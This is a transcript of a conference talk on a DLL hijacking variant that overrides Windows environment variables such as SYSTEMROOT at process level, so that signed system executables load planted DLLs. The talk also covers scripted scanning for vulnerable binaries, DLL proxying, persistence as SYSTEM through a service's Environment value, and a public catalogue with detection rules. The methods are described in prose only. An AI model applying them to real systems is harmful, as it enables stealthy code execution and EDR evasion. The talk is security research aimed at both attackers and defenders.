 So, coming up next is Vitsa and he is a new speaker, so. Lovely, good morning everyone. Welcome, you made it to the final day of DefCon. I'm here to kick off track three this morning, and I'll be talking about DLL hijacking and how you can make that even more fun with environment variables. So, I'll quickly introduce myself. So, my name is Vitsa, that's a Dutch name, but I currently live in London, in the UK, where I work for CrowdStrike as part of the Overwatch elite team as a senior threat hunter. I have previously presented at some of the conferences before, amongst other things about DLL hijacking, and yeah, as I was saying, today I will be talking about how you can do that with environment variables. So, in order to get there, I'm gonna give a quick recap of DLL hijacking and the variants you may be familiar with, then I'll give a quick intro on environment variables, and then later on we're gonna bring them together and do some really cool stuff. So, let's crack on. DLL hijacking. There's a couple of different definitions for that, so I thought before I start, I might give you mine, so we're all clear what I mean by that. So, to me, DLL hijacking is the tricking of a legitimate or trusted assigned executable into loading an arbitrary DLL. So, there are multiple ways of doing that, but in essence, as you can see here on the diagram, you have a trusted program. It normally loads your libraries, the DLLs, and somehow you trick that into loading an evil DLL, right? So, from an offensive perspective, that is great because you don't have to run your own executable. You can leverage the reputation of the trusted program, and that allows you to, if you have a really dumb AV to get away with it, or if you have EDR to make it look a lot more legitimate than it actually is. As I was saying, there's multiple variants, and these are the most common ones. I think most of you may be familiar with DLL sideloading. That is very simple one. You basically have a vulnerable executable that loads DLLs in an unspecified way. It doesn't specify the full path, but a relative path. If you then move the vulnerable executable to an attacker writable folder, you put it next to a malicious DLL, and you execute it, it will allow you to run your malicious code via this trusted program. So, yeah, DLL sideloading, I think, is by far the most common one. Another one is DLL search order hijacking. I think these two are often confused, to be honest. They both leverage the search order, but to me, DLL search order hijacking is when you leave the executable in its original place, program files, just in 32, but if it is vulnerable, it means that you can put a DLL in a location that is searched before the actual DLL, and that means you're literally hijacking the search order. These are much rarer, I think, than most people think there are. So, there's a couple of good candidates there, but there's way, way more DLL sideloading candidates. So, yeah, these are slightly, they're related, but distinct techniques, and I think these are often confused. DLL substitution is one you really shouldn't forget about. It's super simple, right? Just replace the legitimate DLL with a bad one. If you remember Stuxnet, this was literally part of the attacker path. They replaced a legitimate DLL in System32 with a malicious one, and a malicious one inserted extra commands for the industrial control system. So, it is DLL hijacking, right? Maybe not super novel, but you are hijacking a legitimate application. So, these are really common. I wanna quickly touch on three less common ones, which again are all types of DLL hijacking. You may have heard of phantom DLL hijacking. So, this is when an application tries to load a DLL that doesn't exist at all. So, in which case, you can just put the DLL anywhere on the search order, and it will load your DLL. So, that's a really simple one. And again, very few candidates, but if you have a good candidate, it can sometimes lead to privilege escalation or proper persistence. There's also something called Windows SXS hijacking, or Windows side by side hijacking. I think in the past, this was really confusing because it has the word side in it. So, people thought, oh, this is DLL side loading. I've only ever seen one documented case. Again, I don't think it's as prevalent as some people think it is. So, it's basically relying on a specific technique in Windows called Windows side by side, and hijacking it that way. But again, I've only ever seen one proper documented case. And finally, a wider class, input-based hijacking. This is when you manipulate a registry key or a command line, and in that way, manage to load a malicious DLL. So, I think Firefox, for example, still has an executable, but if you run it and if you specify a custom path on the command line, it will just load DLLs from that folder. So, you get a trusted Mozilla executable, and it will load the malicious DLL. So, that's all great, right? So, six types of DLL hijacking. This has been around for a while now, for years, and there have been many great blogs and tools that can help you explain what it is, leverage it yourself, and as a result, we have very well documented techniques that are very well researched, but also very well detected. It just means that if you do this, again, you might trick really basic AV and EDR, but it's less and less likely that you will get away with it. So, that begs the question, if there is something we can do to still have DLL hijacking, right? To still leveraging the reputation of a trusted program, but do it in a better or more stealthy way. So, that is where environment variables come in, and as I said, before I go straight into the hijacking bit, a bit of background, so we're all on the same page as to what environment variables are and why we have them in the first place. Right, environment variables, you may have heard of them. If you use Linux or Unix-based systems, you probably will use them very often. It's basically a variable or a dynamic variable that can be used by running programs. So, as it was already alluding to on Linux and Unix-based systems, these are very prevalent in the shells, right? You may know in the shells on Linux, you get a dollar sign and then a variable name and that allows you in scripts in your terminal to set a variable once and then just leverage it in a script or elsewhere and it can just leverage that value. So, it's like a global variable, right? If you've ever done programming. In Windows, you've got this too. In the command prompt, you can set an environment variable and you leverage it using percentage sign. So, you've got percentage sign and var percentage sign to get the variable contents. What you would almost forget is that processes can also leverage it, right? So, you typically may use it just in a shell but any process can call, for example, from C, you can call the function getEnv with the variable name and it would give you the value that it will set in your environment because after all, environment is like your system, right? Or your shell. So, it's in the scope of your system. Again, it's quite an all-technique. I'll touch on that on the next slide but it's all stored as a string and typically an ASCII string even. So, you can put integers and booleans in there, of course, but you would have to convert them or cast them yourself. It's basically always a string. Right, so, I don't mean to turn this into a proper history lesson but just a bit of background to again understand why we have them and why we still have them in 2022 environment variables. So, the first mainstream OS to have them was Unix V7. So, they were the first mainstream OS to come up with this concept. So, they didn't have to bug programs, program users to ask every time, like, what is your username? What is your home path? Instead, you just define it once, you run a script or program and it would know what your username was. So, very simple. First time was in the late 70s and then only a few years later, PC-DOS 2.0 also included it, same technology in the shell, you could define variables. So, you could probably not see it at the very back but I got a little excerpt of the documentation which basically sums up what it does. So, it's basically saying it's a dynamic variable. It will be replaced in the script if you use it and you can use the set command to give it a name and then a value and then you can leverage that. Right, then early 90s, Windows 3.1 introduces the Windows registry. So, if you've ever used Windows, you will be familiar with it. It's like the central settings hive that you use in Windows. And I think this is quite a pivotal moment for environment variables because when you really think about it, environment variables are supposed to store information that programs can use. Windows registry does pretty much the same, right? It stores all sorts of system-level configuration settings as well as program-level configuration settings. And what we'll see later, environment variables nowadays live in the registry but I think it's really interesting because we still have environment variables but if you think about it, you could really only have the Windows registry and not need environment variables in Windows at all. Cool, then very quickly, end of the century, we had already lots of security vulnerability researches identifying issues with environment variables. Windows defines a couple of them out of the box and for example, the path environment variable which you may have heard of and it caused lots of trouble, lots of vulnerabilities there. So, the earliest I could find was from 1997 or some CIS admin complaining about it not implementing security properly and this person said, why would other application developers bother to support secure configurations if this is what they see coming out of Redmond? So, he was clearly not happy and well, we'll find out later what the people in Redmond did about this vulnerability. And then finally, at the end of the century as well, 1999, the first ever CVEs were issued and the first batch actually included, I think it's two, but at least one environment variable-based security issue that led to privilege escalation. All right, so this was like in one minute, the history of environment variables, but let's again now look at what that looks like in Windows. So, finally enough, you can define as many environment variables as you want but there is an upper limit of the combination of variable names and values. So, any environment variables you define are just stored in one massive concatenated string and this string should not exceed two to the power of 15 minus one characters in total. So, whilst I give you some room, like you can't put proper programs, space 64 encoded in there if you wanted to. As I already said, nowadays, the environment variables that you get when you start your computer are stored in the Windows registry. So, what happens if you start your computer? Windows, like the most parent process, basically when you start your computer, looks up the system-level environment variables in this registry key you see on screen. So, that leaves in HKEY local machine. These are the variables that apply to every user and all services and all service accounts. This is how your system is initialized. When you then log in, it looks up the user-specific environment variables which are stored in HKEY current user. There's also something called current session. I'm not really gonna talk about that today, but it also loads variables that are just defined just for the duration of your session. So, if you log in, you set an environment variable on that level, it will just live for that session and as soon as you log off, it just disappears. And then the final thing, which you would almost forget is that environment variables live on process level. So, you can define an environment variable that is only active within a single process, but not its parents, not its siblings, just one process. So, what normally happens in Windows, you start a new process. The environment variables that that new process has are the same as its parents' environment variables. So, it just keeps passing down the environment variables and because it's quite an all technology and most software doesn't really use it, not really, it just passes down the values unchanged. So, you will have very consistent environment variables across. So, if you know how processes work in Windows, you might be familiar with the process environment block. This contains all sorts of information on the process. So, if you look, for example, at the process parameter struct, you see lots of usual suspect, like information you would expect for a process like the command line, standard in and out handles, current path, but there's also a block for environment variables. And as you see here, this is from my demo lab, this is what you get out of the books when you install Windows. So, this is Windows 11. These are all default defined environment variables that programs might use to, for example, find out where your app data folder is or what your drive letter is. Normally, it's C, but you can change it in the settings and then your program might use that and change it accordingly. But the interesting thing, again, maybe you know it, but I didn't really click is that this exists on process level. Every process has this massive list of environment variables. You can change it on process level. So, if you look, for example, in the Windows API, this is one of the ways in which you can create a new process. You can see that you get the command line application name, but you can also optionally pass environment variables, custom environment variables. So, you can overwrite existing ones or add new ones and that allows you to, or allows the program to leverage them to, I don't know, find out a path or find out your username, whatnot. So, that begs the question again, like from a hacker's mindset, right, is there now a scope for tampering? We've looked at DLL hijacking. We've looked at environment variables. Is there a way in which we can combine these two concepts? Because if you know environment variables, there's a couple of really interesting ones that are used quite often and they link to paths that you normally don't control. If you've just got a foothold on a machine and you don't have admin permissions, you can't write to the C Windows folder, for example. So, the system route environment variable, which points to C slash Windows, is an interesting one. Is there a way in which on process level we could change this and maybe trick a vulnerable executable into loading something that lives in a folder that I control? So, it's the same with the system drive or the Windows directory, which is basically all the version of system route, and same with the program files folders. So, if there are still applications using environment variables, is there a scope for us to tamper with that? So, that's how I started. So, basic concept, you pick an application, you wanna test to see if it's vulnerable. You update one of these environment variables that I was just talking about, and instead of the original folder, you point it to a temp folder or, I don't know, some folder you control. You're gonna start the application, and using, for example, Procmon, you just check, right? Is this application now checking the folder I specified? Because I updated the environment variable, and then, well, hopefully, profit. So, if you look at the diagram over there, at the top, a normal run of this trusted program, it might try to load a DLL from a location using this variable called some variable, and normally, that would resolve to C slash legitimate path, and then the name of the DLL. What I'm proposing is manipulating that, right? On process level, we change the environment variable to, say, C slash evil path, and then, hopefully, if it runs, it will now load the DLL from my location instead. And if the application is stupid enough not to check if there is a signature or do some other form of verification, it might now load my DLL, and that would mean a new type of DLL hijacking. So, this is a working example. This is an example that I found in the system 32.4 that you got an executable that is called hostname. It's a very simple one, it's very boring, it just prints the hostname, right? It just prints the name of your computer. But it turns out that if you run it, just without any command line arguments, just hostname, it will load, I think, three DLLs, one of which is the one you see here. So, it tries to load a DLL dynamically from the system root folder, and then system32 slash, what is it? Mswsoc.dll. So, normally, that means it will load it from C slash windows slash system32 slash at Mswsoc.dll. However, if I now change the environment variable with the PowerShell that you see there at the bottom of the screen, I can now alter the path and trick it into loading my DLL. So, it's a number of ways in which you can do this. This is a way of doing it in PowerShell. So, it uses CLR. So, very simply put, you define a new object, you point it to the original binary, right? We don't need to move hostname, we don't need to do anything special. We just say, this is the executable I want to run, I then remove the system root variable, I then add it again with a new path. So, the new path is now C slash temp slash evil, and then the remaining code is just getting the new object ready and starting the new process. Right, demo time. So, first of all, here I'm showing that I have this temp folder slash evil and that I got this DLL defined. So, I created a sub folder called system32 with the DLL in there. Now, based in the code I just described, hopefully, when I run it, it should give some sort of visual feedback, but also at the top, you see Procmon running. So, hopefully, that will also demonstrate that it loaded the DLL from my location, right? So, not from system32, but from my location. Well, you might not be able to see it, but it popped a window that said hello, Defcon. And of course, it popped Calc because otherwise you wouldn't know I did something bad. So, there's Calc. And in the Procmon window, you can now see, again, it might be a bit too small, but it's basically confirming that the executable is in the expected location, but it loaded my DLL from my temp location, the folder we just looked at. So, a bit of a recap, right? Because, okay, fine, I popped Calc, big deal. Why should we care? So, the great thing is, is that from an offensive point of view, you only need to bring the DLL, right? Because hostname is already on the machine. You just start a new process, you update a variable, and that means that you don't need to bring in your own executable, which is typically the case for DLL sideloading. There's also no special command lines involved. You don't need to, I don't know, suspend the process when you start it. It is, as you've seen, right? It's just a couple of lines in PowerShell. It's pretty straightforward. And one thing I really want to emphasize, right? Environment variables are defined in the registry, but what we just did, we didn't change the registry, right? We just started the process and told it to override the environment variables it was aware of. So that means there is no registry footprint. If anything, right, if I were to change the environment variable, like if I change system routes in the registry, it would break my entire system, right? Because so many programs use it, it would not find DLLs, it would just like make your computer unbootable. So we don't want that. We changed it on process level, and well, we've shown it worked. Also from an AV and EDR perspective, they can see environment variables on process level, but very rarely in my experience, they do actually hunt for it, right? Or you're able to write rules for it. So that means that you might get away with it because the really obvious things like command line and registry artifacts are not there. And yeah, as I said, this was an example with PowerShell, but actually you can also do it with Phoebe script or J script. You could literally write a macro that does this in a very stealthy way. And because you use legitimate processes, like with some DLL hijacking, you would have to run a process from a temple but you just run a process from system 32, right? Again, you might get away with that. You could of course also run it from an executable itself. You could write a C or some C code to launch a process with a different environment variable but that sort of defeats the whole point. So having these script languages support this makes it really powerful. So this is just a static screenshot of how you might do it in Phoebe script. You see the command prompt, which is just executing the Phoebe script file. On the right hand side, you see the code in Phoebe script. It's only four lines. You could actually do it in three if you group some stuff together. And then at the bottom, you see how it worked. So if you look at the Phoebe script code, it just asks for the process level variables. It updates it, system routes again, change it to a temp folder. And then in this case, it runs another executable SL UI. And then at the bottom, you see the evidence that it loaded not one, but actually three DLLs from my folder. You might also see that it actually loaded two, C script also loaded two DLLs from my folder. So that's something to be aware of. Some scripting languages, if you change the environment variable on process level, it will start using it itself too. So if C script needs a DLL and it relies on the same variable, it might actually break. There's a way of working around this, by the way, but I thought I do wanna point it out that it doesn't come without challenge, but it's funny how different languages implemented in a different way. Cool, so final recap for the technique itself. So I already alluded to most of these. DLL side loading, right? Need to bring executable, we don't need that. DLL search order hijacking. Again, I think there are fewer candidates than most people realize. There's only a few really obvious ones. So that means detection is easier. In this case, I will show shortly that are many candidates you can choose from. And same with DLL substitution or input-based DLL hijacking, right? It comes all with extra steps that just mean that you are more likely to be picked up. We don't have any of that. And there are a couple downsides, but I think the main footprint that you have with this technique is the planting of the DLL, right? At some point, you need to put that DLL in that folder that it's gonna load it from. But if you think about it, you're always gonna have that with DLL hijacking, right? You need to execute a DLL. It needs to live somewhere on disk. Again, if you compare it to the other DLL hijacking ones, this one is rather stealthy. Doesn't mean it's undetectable, but it's doing a better job, I think. Cool, so so far, I've only told you about one or two executables, which were a bit anecdotal, right? Like how do you find which ones are vulnerable? So again, we get into the hackest mindset. How would you turn this single observation into a systemic approach? So here's an idea, right? I defined a scope for the executables and DLLs I want to test. So in this case, I just looked at all the DLLs that live in the System32 folder. And what I did is create implants for each and every one of them, how I did that I'll show shortly, but basically every DLL gets its own clone, and whenever it's loaded, it would write a fingerprint file to disk. So a fingerprint file is literally just an empty text file, but the file name shows you which DLL was loaded and which process it was loaded by. So I will have an example of that in a bit, but basically it means that if my DLL was loaded successfully, I will have evidence in the form of a fingerprint file, which like 100% guarantees that my code was loaded and executed. So that's the prep. Then we go to the execution. So now I have thousands of DLLs, because in System32 there is a lot of DLLs. I now need to define the scope for the applications I need to test. So say again, we use System32, right? We just do a star search for all the executables in there. What I now would do is run each and every executable, just one by one, but with the updated environment variable, very similar to the PowerShell script I just showed you, right? In that case, I just ran one, but you just turn it into a for loop iterate over the executables, pointing it to the folder with all these thousands of implants. And then hopefully, if they work successfully, we can now just validate it by looking at the fingerprint files. These will tell me what executables worked and which DLLs were loaded, and that means we can use them in proper attacks. Right, so some of you may have actually done DLL hijacking before, right? Because it's very similar across these different variants. There are a couple of challenges there. So stability being the main one. If you just generate a dummy DLL that just has a DLL main and nothing else, it typically does not get loaded by the vulnerable application. Typically, applications rely on the exports, you know, the export table that tells you which functions you can call. So if those are not present, the executable might reject the file. It might actually become unstable or give some visual feedback. And again, that means you can't really use it for an attack. So a great way to overcome that is to use DLL proxying or function redirection. So the great thing about PE files is that you can define exports. So again, these are public-facing functions you can call. But the great thing is you can actually point these functions or these exports to external files. So through that, I can actually, in my implant, leverage the legitimate functionality. So the DLL would literally do the same thing as the genuine one, but still include my malicious code. So let me actually quickly show you how this works in the context of this attack. So here we have our legitimate application again. And imagine it is trying to load some DLL.dll, right? So that's the implant I created. And in this case, it is a clone of a DLL that has two exports, export A and export B. If I were now to generate an implant, I don't want to reverse engineer this DLL. That's gonna cost way too much time. And I already said there's thousands of DLLs that does not scale. So instead, what I do in my implant, I just say, well, I have an export A and I have an export B, but the functionality lives elsewhere. It's over here. And then you just point it to the legitimate location. So here you see, at the bottom right, you see my fake path again. And I say, well, if you call export A, please go to C slash windows slash some DLL. That's where you find it. And that means that the executable here, whenever it calls my DLL, it would load my code. But whenever it calls a function, it would go to a little legitimate DLL. So that is great because that means that the program is less likely to break. So it's more likely to accept my DLL. And therefore I can actually more reliably perform DLL hijacking. So there was one issue, the reliability. So with DLL proxying, you already cover most of that. But then some executables also leverage DLLs to get like image files or cursor files or like any sort of resources. You can embed these in PE files. So another issue is that if you don't have these, you're implant, that the executable might break. So again, to maximize the number of targets, I could find, I also implemented research cloning, meaning it literally just copies the resource section to the next DLL. And again, that further increases the number of executables that you can choose from. Great, so this is what it looks like. So this is a bash script. I'll be releasing it later today. It uses all sorts of open source tools. But basically it just looks at the legitimate DLL. It looks at the export table, it then copies it. It creates these redirection rules. It then copies the resource section as well. And then by the end, you have an implant DLL with your malicious code, with these function redirections, as well as the resources that have been cloned. So in my test here with the scope and everything we were just talking about, this is literally the main.dll file. As you see, it's nothing fancy. It basically says whenever I'm called and it's a process attached or a threat attached action, then just call generate fingerprint with the name of the executable that run it. And as I already said, that function is literally just creating a text file saying first the name of the DLL, then the name of the executable, and then if the file is there, then hopefully it's proof that it worked. This is then how you would run it, right? So I have now thousands of DLL files. This is the PowerShell script I was talking about. It's a modified version of the one we looked at in the demo. As I said, it's just a for loop, right? It just iterates over everything in the system32 folder. It then changes the environment variable, pointing it to the folder with all the DLL implants and then just runs them one by one. And then hopefully, if you run that, you get lots of these fingerprint files, right? So when I run it on the latest version of Windows 11 that I could get hold of, this what happened. So this is a folder. It's probably too small for the back, but again, you see, for example, a third rack loading a DLL from the system32 folder. And the fact that the file is here, right? It's just an empty text file, but that means that my code was loaded. It was successful. As you may be able to see from the scroll bar, there are quite a few text files in there. So that means there's quite a few options you have to get this to work. So what I'm releasing today is the code that I used. So you can use this for your own research. I've only focused on the system32 folder, but if you wanna leverage any of this yourself, which includes the function redirection and the resource cloning, you can find it on my GitHub page. That's live now. I've used it in Linux, but it uses mainW, so you should be able to use it on Windows as well. And yeah, I mean, let's now take a look at some of the results, right? So you saw these fingerprint files, but what does that really mean? So in the scope that I tested it on, system32 folder, Windows 11, I found 82 unique executables to load 91 unique DLLs. But because most executables load multiple DLLs, there's actually nearly 400 or 398 unique combinations there. So that's quite a few options there, right? So to my earlier point, with DLL search order hijacking, you can usually only choose from a couple, but here you've got 400 out of the box on Windows 11. Then I did some spot checking on other tools. So some other very common enterprise tools like Office, so I tested Word, PowerPoint, Excel. Again, all of these are vulnerable to this type of DLL hijacking. They load at least one, but usually like five or six DLLs. And if you change the system route variable, you can trick it into loading your malicious DLL. Same with some web browsers, I tried Edge, Chrome, Firefox. I tested communication software like Teams and Zoom. All of these are vulnerable. And to me that shows, right? So the number of 400 is great and it sounds really cool, but the overarching point is that it's not about these individual tools. It's a wider problem, right? Applications rely on the system route variable and some others and they don't properly test and that means that there are just many, many results. So this is a whole new class of DLL hijacking that we can now leverage. Cool, then before I go to the next section, some quick remarks on like, how can we take this further? So so far we've only looked at execution, right? Which is what you normally do anyway with DLL hijacking. But is there a way in which we can use this more persistently, for example? Well, that is a bit of a challenge because we need to start the process with the updated environment variables, right? And we already said, we don't wanna change the current user or local machine one because that would break everything. So how do you start a process in a way that it also keeps these overwritten environment variables? So that is quite tricky. To my knowledge, you can't do that with an L and K file, for example. You could of course just use the PowerShell script or VB script and run that persistently, but that is not really persistence, is it? It sort of like defies the whole point. You might as well then do the bad stuff in the script. What you could do, however, if you already admin, if you already have elevated privileges, you could change a service. So Windows Services is like a Daemon Linux, allows you to start stuff persistently. So the screen shell you see here is from the printer spooler, which is started by default on Windows 11 installations. There is a very underused or underutilized registry value, you can set, called environment. As you can guess, you can literally just specify environment variables in there that will be used in the scope of that service. So in this case, printer spooler, I just set system root once again. I pointed it to my folder with all my implants and well, yeah, what do you think is gonna happen if I restart the servers or reboot the machine? Luckily enough, it loaded one of my DLLs. It's the same one again, MSW SOC. The great thing, however, is that it now also runs it as system. Most Windows Services, not all of them, but most of them run either with a service account or system. So it's not really privileged escalation, of course, but if you are admin and you want to elevate yourself to system in a stealthier way, this is a cool way of doing it. Because you could argue, right, if you already have admin, you might as well just change the command of the service. But that is something that EDR and AV are typically pick up on, whereas this is maybe something that isn't really monitored. So, and again, if you do the DLL, if you implement the DLL properly, the printer spooler server would still work, right? It just also executes your malicious code. So there's less scope of breaking stuff and therefore it's stealthier. But yeah, coming back to privileged escalation, can you do real privileged escalation with this or even use your account control bypass? Now, this is where we come back to that earlier comment on the security and Microsoft design. So in the Windows API, you have generally two ways of spawning a new process. You've got create process and shell execute. The former cannot run programs that run with more privileges than yourself. So if you are medium integrity, you can't get it to run high integrity without doing something weird. Shell execute can, but whenever you do that, it does not take your process level environment variables. This seems to be a very conscious decision by Microsoft to limit the scope for privileged escalation. Any process that is run with a higher integrity level than the one it was spawned from will generally just reset the environment variables to the one defined on system level or use the level of that applies. This seems to be a reaction to that path environment variable thing that we mentioned at the very start. So that caused a lot of trouble in the past and Microsoft decided, no, we're gonna implement it this way and that means there is less scope for environment variable based privileged escalation. And you gotta give it to them because in this case it does work, right? It does hold us back. It means we can't do user account control bypass in the traditional way. What I will, however, say is that there are a couple of anecdotal instances where the executable that is spawned is known to override this behavior. So there's one or two that I've seen that even though they are spawned with higher integrity level, they still manually copy back the environment variables of the parent process, sort of overriding this behavior. So if that is the case, you could of course still use this technique for privileged escalation. Okay, right, some final remarks. What does this mean? We've now looked at new type of DLL hijacking. There's a couple of other ones. What does the future hold? I think the bottom line is what I'm really trying to say here is that DLL hijacking is not gonna go away. Even if we magically fixed all these issues, including the other variants, we would still have to deal with it because attackers could still bring in back these older versions, right? I could now copy these Windows 11 executables, bring it to a fully patched system and you would still have to deal with the program because they're still signed, they're still trusted and still vulnerable. So I think we need to learn to live with DLL hijacking and from an offensive point of view, it's all about making it stealthier. From a defensive point of view, it's all about limiting the scope. So in order to aid with that, in the last few months, I have tried to document all sorts of DLL hijacking types that I could find and centralize them in a curated repo. So as of this morning, you can now go to hijacklibs.net, you get a nice portal there and you can find not only the environment variable DLL hijacking ones I've been talking about so far, but also other ones, you can also find site loading, phantom DLL hijacking, search order hijacking. Yeah, as I said, I'm trying to make it more central. Again, all the entries there have public resources so it has been blogged about before, tweeted about before, but I'm trying to bring them together so we can get a better idea of the scope and see how you can use this all defend against it if that's what you're after. It's an open source project. I really hope that as a community, we can really keep adding stuff to it, to raise awareness for it, again, both for offensive and defensive because I think there's a lot we can learn from each other there. So very basically, how does it work? I've got a bit of a demo as well, but every vulnerable DLL that has its own entry, it breaks down the number of, it breaks down the types of DLL hijacking so it could be environment variable based, it could also be site loading. Sometimes it's both. It tells you where the DLL is normally located, it tells you where the executable is normally located and for the blue team side, you also get some very basic detection logic that you could leverage. So let's take a quick look. There we go. So on the front page, it lists a couple of new entries. You can also browse by vendor. In this case, I'm gonna look up a specific DLL I'm interested in. It tells me there are two types of DLL hijacking, search order hijacking and site loading. It gives me the resources. So if there's a blog or a tweet, it can be really useful. As I said, you can see the paths where you would normally see it and then it tells you what executables are vulnerable as well. Yeah, here you see some SIG my code. It's an open source format for defining detection rules. If I then say, for example, look for a specific vendor, so this is Trend Micro, I can see some other stuff as well. So this is a type of a phantom DLL hijacking that actually had a CVE and it tells you how you can use that for privilege escalation. Again, this is all public information that's all been talked about, but it just helps you understand what options you have. If you very quickly want to see everything, just type .exe, you get all the mappings between a DLL and the vulnerable executables that you could leverage for that. And yeah, that's the end of the demo. So as I was saying, about to wrap up. It's now live, hijacklips.net. It's an open source project. It's all on GitHub. It is hosted in GitHub as well. So if you have any new entries or if you want to improve or want to help this project, to keep this project going, please do contribute. If you go to the website, there is a link to the repo where you can find more. And that is what I had to share with you today. I really hope that was useful. If you have any feedback, obviously come find me afterwards here at the stage or follow me on Twitter. My DMs are open at Vita. And thank you very much for showing up on Sunday morning.